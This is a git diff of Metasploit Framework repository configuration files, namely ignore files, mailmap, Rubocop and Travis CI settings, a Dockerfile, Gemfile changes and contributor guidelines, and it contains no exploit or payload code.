automatic module_metadata_base.json update

Land #12186 - Add RDP Fingerprinting
Revert "Land #12181 , add Juniper config parser tests"
2019-08-21 16:01:49 -07:00 · 2019-08-21 15:46:35 -07:00 · 2019-08-20 10:39:54 -05:00 · 2019-08-20 10:39:41 -05:00 · 2019-08-20 05:56:18 -07:00 · 2019-08-20 02:07:07 -07:00
5861 changed files with 535427 additions and 41161 deletions
@@ -0,0 +1,105 @@
+.dockerignore
+.gitignore
+.env*
+docker-compose*.yml
+docker/
+!docker/msfconsole.rc
+!docker/entrypoint.sh
+!docker/database.yml
+Dockerfile
+README.md
+.git/
+.github/
+.ruby-version
+.ruby-gemset
+
+.bundle
+Gemfile.local
+Gemfile.local.lock
+# Rubymine project directory
+.idea
+# Sublime Text project directory (not created by ST by default)
+.sublime-project
+# RVM control file, keep this to avoid backdooring Metasploit
+.rvmrc
+# Allow for a local choice of (unsupported / semi-supported) ruby versions
+# See PR #4136 for usage, but example usage for rvm:
+#   rvm --create --versions-conf use 2.1.4@metasploit-framework
+# Because rbenv doesn't use .versions.conf, to achieve this same functionality, run:
+#   rbenv shell 2.1.4
+.versions.conf
+# YARD cache directory
+.yardoc
+# Mac OS X files
+.DS_Store
+# database config for testing
+config/database.yml
+# target config file for testing
+features/support/targets.yml
+# simplecov coverage data
+coverage/
+doc/
+external/source/meterpreter/java/bin
+external/source/meterpreter/java/build
+external/source/meterpreter/java/extensions
+external/source/javapayload/bin
+external/source/javapayload/build
+# Java binary ignores. Replace the 5 above with this once we're merged.
+external/source/javapayload/*/.classpath
+external/source/javapayload/*/.project
+external/source/javapayload/*/.settings
+external/source/javapayload/*/bin
+external/source/javapayload/*/target
+external/source/javapayload/*/*/.classpath
+external/source/javapayload/*/*/.project
+external/source/javapayload/*/*/.settings
+external/source/javapayload/*/*/bin
+external/source/javapayload/*/*/target
+# Packaging directory
+pkg
+tags
+*.swp
+*.orig
+*.rej
+*~
+# Ignore backups of retabbed files
+*.notab
+
+# ignore Visual Studio external source garbage
+*.suo
+*.sdf
+*.opensdf
+*.user
+
+# Rails log directory
+/log
+# Rails tmp directory
+/tmp
+
+# ignore release/debug folders for exploits
+external/source/exploits/**/Debug
+external/source/exploits/**/Release
+
+# Avoid checking in Meterpreter binaries. These are supplied upstream by
+# the metasploit-payloads gem.
+data/meterpreter/*.dll
+data/meterpreter/*.php
+data/meterpreter/*.py
+data/meterpreter/*.bin
+data/meterpreter/*.jar
+data/meterpreter/*.lso
+data/android
+data/java
+
+# Avoid checking in Meterpreter libs that are built from
+# private source. If you're interested in this functionality,
+# check out Metasploit Pro: https://metasploit.com/download
+data/meterpreter/ext_server_pivot.*.dll
+
+# Avoid checking in metakitty, the source for
+# https://rapid7.github.io/metasploit-framework. It's an orphan branch.
+/metakitty
+.vagrant
+
+# no need for rspecs
+spec/
@@ -2,6 +2,8 @@
 Tell us what this change does. If you're fixing a bug, please mention
 the github issue number.

+Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.
+
 ## Verification

 List the steps needed to make sure this thing works
@@ -11,4 +13,5 @@ List the steps needed to make sure this thing works
 - [ ] ...
 - [ ] **Verify** the thing does what it should
 - [ ] **Verify** the thing does not do what it should not
+- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

@@ -78,10 +78,22 @@ data/java

 # Avoid checking in Meterpreter libs that are built from
 # private source. If you're interested in this functionality,
-# check out Metasploit Pro: http://metasploit.com/download
+# check out Metasploit Pro: https://metasploit.com/download
 data/meterpreter/ext_server_pivot.*.dll

 # Avoid checking in metakitty, the source for
 # https://rapid7.github.io/metasploit-framework. It's an orphan branch.
 /metakitty
 .vagrant
+
+# local docker compose overrides
+docker-compose.local*
+.env
+
+# Ignore python bytecode
+*.pyc
+rspec.failures
+
+
+#Ignore any base disk store files
+db/modules_metadata_base.pstore
@@ -1,6 +1,7 @@
 acammack-r7 <acammack-r7@github>     <acammack@aus-mbp-1099.aus.rapid7.com>
 acammack-r7 <acammack-r7@github>     <adam_cammack@rapid7.com>
 acammack-r7 <acammack-r7@github>     <Adam_Cammack@rapid7.com>
+asoto-r7 <asoto-r7@github>           <aaron_soto@rapid7.com>
 bcook-r7 <bcook-r7@github>           <bcook@rapid7.com>
 bcook-r7 <bcook-r7@github>           <busterb@gmail.com>
 bpatterson-r7 <bpatterson-r7@github> <“bpatterson@rapid7.com”>
@@ -30,6 +31,7 @@ lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@gmail.com>
 lsanchez-r7 <lsanchez-r7@github>     <lance.sanchez@rapid7.com>
 lsato-r7 <lsato-r7@github>           <lsato@rapid7.com>
 lvarela-r7 <lvarela-r7@github>       <“leonardo_varela@rapid7.com”>
+mkienow-r7 <mkienow-r7@github>       <matthew_kienow@rapid7.com>
 pbarry-r7 <pbarry-r7@github>         <pearce_barry@rapid7.com>
 pdeardorff-r7 <pdeardorff-r7@github> <paul_deardorff@rapid7.com>
 pdeardorff-r7 <pdeardorff-r7@github> <Paul_Deardorff@rapid7.com>
@@ -39,6 +41,7 @@ sdavis-r7 <sdavis-r7@github>         <sdavis@rapid7.com>
 sgonzalez-r7 <sgonzalez-r7@github>   <sgonzalez@rapid7.com>
 sgonzalez-r7 <sgonzalez-r7@github>   <sonny_gonzalez@rapid7.com>
 shuckins-r7 <shuckins-r7@github>     <samuel_huckins@rapid7.com>
+space-r7 <space-r7@github>           <shelby_pace@rapid7.com>
 tatanus <tatanus@github>             <adam_compton@rapid7.com>
 tdoan-r7 <tdoan-r7@github>           <thao_doan@rapid7.com>
 todb-r7 <todb-r7@github>             <tod_beardsley@rapid7.com>
@@ -61,7 +64,6 @@ wwebb-r7 <wwebb-r7@github>           <William_Webb@rapid7.com>

 bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
 bcoles <bcoles@github>                 bcoles <bcoles@gmail.com>
-bcoles <bcoles@github>                 Brendan Coles <bcoles@gmail.com>
 bokojan <bokojan@github>               parzamendi-r7 <peter_arzamendi@rapid7.com>
 brandonprry <brandonprry@github>       <bperry@brandons-mbp.attlocal.net>
 brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
@@ -80,6 +82,7 @@ corelanc0d3r <corelanc0d3r@github>     corelanc0d3r <peter.ve@corelan.be>
 corelanc0d3r <corelanc0d3r@github>     Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
 crcatala <crcatala@github>             Christian Catalan <ccatalan@rapid7.com>
 darkoperator <darkoperator@github>     Carlos Perez <carlos_perez@darkoperator.com>
+DanielRTeixeira <DanielRTeixeira@github> Daniel Teixeira <danieljcrteixeira@gmail.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
 espreto <espreto@github>               <robertoespreto@gmail.com>
@@ -8,22 +8,88 @@

 # inherit_from: .rubocop_todo.yml

+AllCops:
+  TargetRubyVersion: 2.4
+
 Metrics/ClassLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
  Enabled: true
  Exclude:
    - 'modules/**/*'

+Style/ClassAndModuleChildren:
+  Enabled: false
+  Description: 'Forced nesting is harmful for grepping and general code comprehension'
+
+Metrics/AbcSize:
+  Enabled: false
+  Description: 'This is often a red-herring'
+
+Metrics/CyclomaticComplexity:
+  Enabled: false
+  Description: 'This is often a red-herring'
+
+Metrics/PerceivedComplexity:
+  Enabled: false
+  Description: 'This is often a red-herring'
+
+Style/TernaryParentheses:
+  Enabled: false
+  Description: 'This outright produces bugs'
+
+Style/FrozenStringLiteralComment:
+  Enabled: false
+  Description: 'We cannot support this yet without a lot of things breaking'
+
+Style/RedundantReturn:
+  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
+  Enabled: false
+
+Naming/VariableNumber:
+  Description: 'To make it easier to use reference code, disable this cop'
+  Enabled: false
+
+Style/NumericPredicate:
+  Description: 'This adds no efficiency nor space saving'
+  Enabled: false
+
 Style/Documentation:
  Enabled: true
  Description: 'Most Metasploit modules do not have class documentation.'
  Exclude:
    - 'modules/**/*'

+Layout/SpaceInsideArrayLiteralBrackets:
+  Enabled: false
+  Description: 'Almost all module metadata have space in brackets'
+
+Style/GuardClause:
+  Enabled: false
+  Description: 'This often introduces bugs in tested code'
+
+Style/EmptyLiteral:
+  Enabled: false
+  Description: 'This looks awkward when you mix empty and non-empty literals'
+
+Style/NegatedIf:
+  Enabled: false
+  Description: 'This often introduces bugs in tested code'
+
+Style/ConditionalAssignment:
+  Enabled: false
+  Description: 'This is confusing for folks coming from other languages'
+
 Style/Encoding:
-  Enabled: true
  Description: 'We prefer binary to UTF-8.'
-  EnforcedStyle: 'when_needed'
+  Enabled: false
+
+Style/ParenthesesAroundCondition:
+  Enabled: false
+  Description: 'This is used in too many places to discount, especially in ported code. Has little effect'
+
+Style/TrailingCommaInArrayLiteral:
+  Enabled: false
+  Description: 'This is often a useful pattern, and is actually required by other languages. It does not hurt.'

 Metrics/LineLength:
  Description: >-
@@ -32,6 +98,13 @@ Metrics/LineLength:
  Enabled: true
  Max: 180

+Metrics/BlockLength:
+  Enabled: true
+  Description: >-
+                  While the style guide suggests 10 lines, exploit definitions
+                  often exceed 200 lines.
+  Max: 300
+
 Metrics/MethodLength:
  Enabled: true
  Description: >-
@@ -39,10 +112,10 @@ Metrics/MethodLength:
                  often exceed 200 lines.
  Max: 300

-# Basically everything in metasploit needs binary encoding, not UTF-8.
-# Disable this here and enforce it through msftidy
-Style/Encoding:
-  Enabled: false
+Naming/UncommunicativeMethodParamName:
+  Enabled: true
+  Description: 'Whoever made this requirement never looked at crypto methods, IV'
+  MinNameLength: 2

 # %q() is super useful for long strings split over multiple lines and
 # is very common in module constructors for things like descriptions
@@ -53,9 +126,30 @@ Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'

-Style/SpaceInsideBrackets:
+Layout/AlignHash:
  Enabled: false
-  Description: 'Until module template are final, most modules will fail this.'
+  Description: 'aligning info hashes to match these rules is almost impossible to get right'
+
+Layout/EmptyLines:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
+Layout/EmptyLinesAroundClassBody:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
+Layout/EmptyLinesAroundMethodBody:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
+Layout/AlignParameters:
+  Enabled: true
+  EnforcedStyle: 'with_fixed_indentation'
+  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'
+
+Style/For:
+  Enabled: false
+  Description: 'if a module is written with a for loop, it cannot always be logically replaced with each'

 Style/StringLiterals:
  Enabled: false
@@ -65,6 +159,10 @@ Style/WordArray:
  Enabled: false
  Description: 'Metasploit prefers consistent use of []'

+Style/IfUnlessModifier:
+  Enabled: false
+  Description: 'This style might save a couple of lines, but often makes code less clear'
+
 Style/RedundantBegin:
  Exclude:
    # this pattern is very common and somewhat unavoidable
@@ -1 +1 @@
-2.3.3
+2.6.2
@@ -11,15 +11,27 @@ addons:
      - graphviz
 language: ruby
 rvm:
-  - '2.3.3'
+  - '2.5.5'
+  - '2.6.2'

 env:
-  - RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true
-  - RAKE_TASKS=spec SPEC_OPTS="--tag content"
-  - RAKE_TASKS=spec SPEC_OPTS="--tag ~content"
+  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
+  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'

 matrix:
  fast_finish: true
+
+jobs:
+  # build docker image
+  include:
+  - env: CMD="/usr/bin/docker-compose build" DOCKER="true"
+    # we do not need any setup
+    before_install: skip
+    install: skip
+    before_script:
+      - curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` > docker-compose
+      - chmod +x docker-compose
+      - sudo mv docker-compose /usr/bin
 before_install:
  - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
  - rake --version
@@ -27,14 +39,22 @@ before_install:
  - ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
  - ls -la ./.git/hooks
  - ./.git/hooks/post-merge
+  # Update the bundler
+  - gem update --system
+  - gem install bundler
 before_script:
  - cp config/database.yml.travis config/database.yml
  - bundle exec rake --version
  - bundle exec rake db:create
  - bundle exec rake db:migrate
-script:
  # fail build if db/schema.rb update is not committed
-  - git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS
+  - git diff --exit-code db/schema.rb
+script:
+  - echo "${CMD}"
+    # we need travis_wait because the Docker build job can take longer than 10 minutes
+    #- if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
+    # docker_wait is currently broken on travis-ci, so let's just run CMD directly for now
+  - bash -c "${CMD}"

 notifications:
  irc: "irc.freenode.org#msfnotify"
@@ -47,3 +67,6 @@ branches:
  except:
    - gh-pages
    - metakitty
+
+services:
+  - docker
@@ -2,7 +2,7 @@
 --exclude samples/
 --exclude \.ut\.rb/
 --exclude \.ts\.rb/
--files CONTRIBUTING.md,COPYING,HACKING,LICENSE
+--files CONTRIBUTING.md,COPYING,LICENSE
 app/**/*.rb
 lib/msf/**/*.rb
 lib/metasploit/**/*.rb
@@ -37,7 +37,7 @@ when an individual is representing the project or its community.
 Instances of abusive, harassing, or otherwise unacceptable behavior may be
 reported by contacting the project maintainers at msfdev@metasploit.com. If
 the incident involves a committer, you may report directly to
-egypt@metasploit.com or todb@metasploit.com.
+caitlin_condon@rapid7.com or todb@metasploit.com.

 All complaints will be reviewed and investigated and will result in a
 response that is deemed necessary and appropriate to the circumstances.
@@ -1,77 +1,57 @@
 # Hello, World!

 Thanks for your interest in making Metasploit -- and therefore, the
-world -- a better place!
-
-Are you about to report a bug? Sorry to hear it. Here's our [Issue tracker].
-Please try to be as specific as you can about your problem; include steps
-to reproduce (cut and paste from your console output if it's helpful) and
-what you were expecting to happen.
-
-Are you about to report a security vulnerability in Metasploit itself?
-How ironic! Please take a look at Rapid7's [Vulnerability
-Disclosure Policy](https://www.rapid7.com/disclosure.jsp), and send
-your report to security@rapid7.com using our [PGP key].
-
-Are you about to contribute some new functionality, a bug fix, or a new
-Metasploit module? If so, read on...
+world -- a better place!  Before you get started, review our
+[Code of Conduct].  There are mutliple ways to help beyond just writing code:
+ - [Submit bugs and feature requests] with detailed information about your issue or idea.
+ - [Help fellow users with open issues] or [help fellow committers test recent pull requests].
+ - [Report a security vulnerability in Metasploit itself] to Rapid7.
+ - Submit an updated or brand new module!  We are always eager for exploits, scanners, and new
+   integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.

 # Contributing to Metasploit

-What you see here in CONTRIBUTING.md is a bullet point list of the do's
-and don'ts of how to make sure *your* valuable contributions actually
-make it into Metasploit's master branch.
-
-If you care not to follow these rules, your contribution **will** be
-closed. Sorry!
-
-This is intended to be a **short** list. The [wiki] is much more
-exhaustive and reveals many mysteries. If you read nothing else, take a
-look at the standard [development environment setup] guide
-and Metasploit's [Common Coding Mistakes].
+Here's a short list of do's and don'ts to make sure *your* valuable contributions actually make
+it into Metasploit's master branch.  If you do not care to follow these rules, your contribution
+**will** be closed. Sorry!

 ## Code Contributions

-* **Do** stick to the [Ruby style guide].
-* **Do** get [Rubocop] relatively quiet against the code you are adding or modifying.
+* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
 * **Do** follow the [50/72 rule] for Git commit messages.
-* **Don't** use the default merge messages when merging from other branches.
-* **Do** create a [topic branch] to work on instead of working directly on `master`.
 * **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
+* **Do** create a [topic branch] to work on instead of working directly on `master`.
+  This helps protect the process, ensures users are aware of commits on the branch being considered for merge,
+  allows for a location for more commits to be offered without mingling with other contributor changes,
+  and allows contributors to make progress while a PR is still being reviewed.
+

 ### Pull Requests

-* **Do** target your pull request to the **master branch**. Not staging, not develop, not release.
+* **Do** write "WIP" on your PR and/or open a [draft PR] if submitting **working** yet unfinished code.
+* **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for witnessable effects in `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
-* **Do** [reference associated issues] in your pull request description
-* **Do** write [release notes] once a pull request is landed
+* **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.

-Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
+Pull request [PR#9966] is a good example to follow.

 #### New Modules

-* **Do** run `tools/dev/msftidy.rb` against your module and fix any errors or warnings that come up.
-  - It would be even better to set up `msftidy.rb` as a [pre-commit hook].
-* **Do** use the many module mixin [API]s. Wheel improvements are welcome; wheel reinventions, not so much.
+* **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
+* **Do** use the many module mixin [API]s.
 * **Don't** include more than one module per pull request.
-* **Do** include instructions on how to setup the vulnerable environment or software
-* **Do** include [Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation) showing sample run-throughs
-
-
-
-#### Scripts
-
-* **Don't** submit new [scripts].  Scripts are shipped as examples for
-  automating local tasks, and anything "serious" can be done with post
-  modules and local exploits.
+* **Do** include instructions on how to setup the vulnerable environment or software.
+* **Do** include [Module Documentation] showing sample run-throughs.
+* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and
+  anything "serious" can be done with post modules and local exploits.

 #### Library Code

-* **Do** write [RSpec] tests - even the smallest change in library land can thoroughly screw things up.
+* **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
 * **Do** follow [Better Specs] - it's like the style guide for specs.
 * **Do** write [YARD] documentation - this makes it easier for people to use your code.
 * **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.
@@ -79,44 +59,46 @@ Pull requests [PR#2940] and [PR#3043] are a couple good examples to follow.
 #### Bug Fixes

 * **Do** include reproduction steps in the form of verification steps.
-* **Do** include a link to any corresponding [Issues] in the format of
-  `See #1234` in your commit description.
+* **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.

 ## Bug Reports

-* **Do** report vulnerabilities in Rapid7 software directly to security@rapid7.com.
+Please report vulnerabilities in Rapid7 software directly to security@rapid7.com. For more on our disclosure policy and Rapid7's approach to coordinated disclosure, [head over here](https://www.rapid7.com/security). 
+
+When reporting Metasploit issues:
 * **Do** write a detailed description of your bug and use a descriptive title.
-* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
+* **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
 * **Don't** file duplicate reports; search for your bug before filing a new report.

-If you need some more guidance, talk to the main body of open
-source contributors over on the [Freenode IRC channel],
-or e-mail us at the [metasploit-hackers] mailing list.
+If you need some more guidance, talk to the main body of open source contributors over on our
+[Metasploit Slack] or [#metasploit on Freenode IRC].

-Also, **thank you** for taking the few moments to read this far! You're
-already way ahead of the curve, so keep it up!
+Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
+curve, so keep it up!

-[Issue Tracker]:http://r-7.co/MSF-BUGv1
-[PGP key]:http://pgp.mit.edu:11371/pks/lookup?op=vindex&search=0x2380F85B8AD4DB8D
-[wiki]:https://github.com/rapid7/metasploit-framework/wiki
-[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
-[development environment setup]:http://r-7.co/MSF-DEV
-[Common Coding Mistakes]:https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
+[Code of Conduct]:https://github.com/rapid7/metasploit-framework/wiki/CODE_OF_CONDUCT.md
+[Submit bugs and feature requests]:http://r-7.co/MSF-BUGv1
+[Help fellow users with open issues]:https://github.com/rapid7/metasploit-framework/issues
+[help fellow committers test recently submitted pull requests]:https://github.com/rapid7/metasploit-framework/pulls
+[Report a security vulnerability in Metasploit itself]:https://www.rapid7.com/disclosure.jsp
+[development environment]:http://r-7.co/MSF-DEV
+[proof-of-concept exploits]:https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true
 [Ruby style guide]:https://github.com/bbatsov/ruby-style-guide
 [Rubocop]:https://rubygems.org/search?query=rubocop
 [50/72 rule]:http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html
 [topic branch]:http://git-scm.com/book/en/Git-Branching-Branching-Workflows#Topic-Branches
+[draft PR]:https://help.github.com/en/articles/about-pull-requests#draft-pull-requests
 [console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
 [verification steps]:https://help.github.com/articles/writing-on-github#task-lists
 [reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
-[release notes]:https://github.com/rapid7/metasploit-framework/wiki/Adding-Release-Notes-to-PRs
-[PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
-[PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
+[PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
 [pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
 [API]:https://rapid7.github.io/metasploit-framework/api
+[Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
+[scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
 [RSpec]:http://rspec.info
 [Better Specs]:http://betterspecs.org
 [YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
-[Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
-[metasploit-hackers]:https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
+[Metasploit Slack]:https://www.metasploit.com/slack
+[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
@@ -1,4 +1,4 @@
-Copyright (C) 2006-2017, Rapid7, Inc.
+Copyright (C) 2006-2018, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
@@ -0,0 +1,66 @@
+FROM ruby:2.6.2-alpine3.9 AS builder
+LABEL maintainer="Rapid7"
+
+ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
+ENV APP_HOME=/usr/src/metasploit-framework
+ENV BUNDLE_IGNORE_MESSAGES="true"
+WORKDIR $APP_HOME
+
+COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME/
+COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb
+COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb
+COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb
+
+RUN apk add --no-cache \
+      autoconf \
+      bison \
+      build-base \
+      ruby-dev \
+      openssl-dev \
+      readline-dev \
+      sqlite-dev \
+      postgresql-dev \
+      libpcap-dev \
+      libxml2-dev \
+      libxslt-dev \
+      yaml-dev \
+      zlib-dev \
+      ncurses-dev \
+      git \
+    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
+    && gem update --system \
+    && bundle install --clean --no-cache --system $BUNDLER_ARGS \
+    # temp fix for https://github.com/bundler/bundler/issues/6680
+    && rm -rf /usr/local/bundle/cache \
+    # needed so non root users can read content of the bundle
+    && chmod -R a+r /usr/local/bundle
+
+
+FROM ruby:2.6.2-alpine3.9
+LABEL maintainer="Rapid7"
+
+ENV APP_HOME=/usr/src/metasploit-framework
+ENV NMAP_PRIVILEGED=""
+ENV METASPLOIT_GROUP=metasploit
+
+# used for the copy command
+RUN addgroup -S $METASPLOIT_GROUP
+
+RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python python3 ncurses libcap su-exec
+
+RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
+RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
+
+COPY --chown=root:metasploit --from=builder /usr/local/bundle /usr/local/bundle
+COPY --chown=root:metasploit . $APP_HOME/
+RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
+
+WORKDIR $APP_HOME
+
+# we need this entrypoint to dynamically create a user
+# matching the hosts UID and GID so we can mount something
+# from the users home directory. If the IDs don't match
+# it results in access denied errors.
+ENTRYPOINT ["docker/entrypoint.sh"]
+
+CMD ["./msfconsole", "-r", "docker/msfconsole.rc", "-y", "$APP_HOME/config/database.yml"]
@@ -3,11 +3,11 @@ source 'https://rubygems.org'
 #   spec.add_runtime_dependency '<name>', [<version requirements>]
 gemspec name: 'metasploit-framework'

+gem 'sqlite3', '~>1.3.0'
+
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
  # code coverage for tests
-  # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
-  # see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
  gem 'simplecov'
 end

@@ -19,8 +19,10 @@ group :development do
  # for development and testing purposes
  gem 'pry'
  # module documentation
-  gem 'octokit', '~> 4.0'
-  # rails-upgrade staging gems
+  gem 'octokit'
+  # Metasploit::Aggregator external session proxy
+  # disabled during 2.5 transition until aggregator is available
+  #gem 'metasploit-aggregator'
 end

 group :development, :test do
@@ -33,14 +35,10 @@ group :development, :test do
  # Define `rake spec`.  Must be in development AND test so that its available by default as a rake test when the
  # environment is development
  gem 'rspec-rails'
+  gem 'rspec-rerun'
 end

 group :test do
-  # cucumber extension for testing command line applications, like msfconsole
-  gem 'aruba'
-  # cucumber + automatic database cleaning with database_cleaner
-  gem 'cucumber-rails', :require => false
-  gem 'shoulda-matchers'
  # Manipulate Time.now in specs
  gem 'timecop'
 end
@@ -27,8 +27,6 @@ end

 # Create a custom group
 group :local do
-  # Use pry-debugger to step through code during development
-  gem 'pry-debugger', '~> 0.2'
  # Add the lab gem so that the 'lab' plugin will work again
  gem 'lab', '~> 0.2.7'
 end
@@ -1,39 +1,48 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (4.13.26)
+    metasploit-framework (4.17.76)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
-      bcrypt
+      backports
+      bcrypt (= 3.1.12)
+      bcrypt_pbkdf
      bit-struct
+      concurrent-ruby (= 1.0.5)
+      dnsruby
+      ed25519
+      faker
      filesize
      jsobfu
      json
      metasm
      metasploit-concern
-      metasploit-credential
+      metasploit-credential (< 3.0.0)
      metasploit-model
-      metasploit-payloads (= 1.2.14)
-      metasploit_data_models
-      metasploit_payloads-mettle (= 0.1.7)
+      metasploit-payloads (= 1.3.70)
+      metasploit_data_models (< 3.0.0)
+      metasploit_payloads-mettle (= 0.5.16)
+      mqtt
      msgpack
      nessus_rest
      net-ssh
      network_interface
+      nexpose
      nokogiri
      octokit
      openssl-ccm
      openvas-omp
-      packetfu (= 1.1.13.pre)
+      packetfu
      patch_finder
      pcaprub
-      pg
+      pdf-reader
+      pg (~> 0.20)
      railties
      rb-readline
      recog
      redcarpet
-      rex-arch (= 0.1.4)
+      rex-arch
      rex-bin_tools
      rex-core
      rex-encoder
@@ -46,12 +55,13 @@ PATH
      rex-random_identifier
      rex-registry
      rex-rop_builder
-      rex-socket
+      rex-socket (= 0.1.17)
      rex-sslscan
      rex-struct2
      rex-text
      rex-zip
-      robots
+      ruby-macho
+      ruby_smb
      rubyntlm
      rubyzip
      sqlite3
@@ -59,117 +69,99 @@ PATH
      tzinfo
      tzinfo-data
      windows_error
+      xdr
+      xmlrpc

 GEM
  remote: https://rubygems.org/
  specs:
-    actionpack (4.2.8)
-      actionview (= 4.2.8)
-      activesupport (= 4.2.8)
+    Ascii85 (1.0.3)
+    actionpack (4.2.11.1)
+      actionview (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      rack (~> 1.6)
      rack-test (~> 0.6.2)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.8)
-      activesupport (= 4.2.8)
+    actionview (4.2.11.1)
+      activesupport (= 4.2.11.1)
      builder (~> 3.1)
      erubis (~> 2.7.0)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.3)
-    activemodel (4.2.8)
-      activesupport (= 4.2.8)
+    activemodel (4.2.11.1)
+      activesupport (= 4.2.11.1)
      builder (~> 3.1)
-    activerecord (4.2.8)
-      activemodel (= 4.2.8)
-      activesupport (= 4.2.8)
+    activerecord (4.2.11.1)
+      activemodel (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      arel (~> 6.0)
-    activesupport (4.2.8)
+    activesupport (4.2.11.1)
      i18n (~> 0.7)
      minitest (~> 5.1)
      thread_safe (~> 0.3, >= 0.3.4)
      tzinfo (~> 1.1)
-    addressable (2.5.0)
-      public_suffix (~> 2.0, >= 2.0.2)
+    addressable (2.6.0)
+      public_suffix (>= 2.0.2, < 4.0)
+    afm (0.2.2)
    arel (6.0.4)
-    arel-helpers (2.3.0)
-      activerecord (>= 3.1.0, < 6)
-    aruba (0.14.2)
-      childprocess (~> 0.5.6)
-      contracts (~> 0.9)
-      cucumber (>= 1.3.19)
-      ffi (~> 1.9.10)
-      rspec-expectations (>= 2.99)
-      thor (~> 0.19)
-    bcrypt (3.1.11)
-    bit-struct (0.15.0)
+    arel-helpers (2.10.0)
+      activerecord (>= 3.1.0, < 7)
+    backports (3.15.0)
+    bcrypt (3.1.12)
+    bcrypt_pbkdf (1.0.1)
+    bindata (2.4.4)
+    bit-struct (0.16)
    builder (3.2.3)
-    capybara (2.12.1)
-      addressable
-      mime-types (>= 1.16)
-      nokogiri (>= 1.3.3)
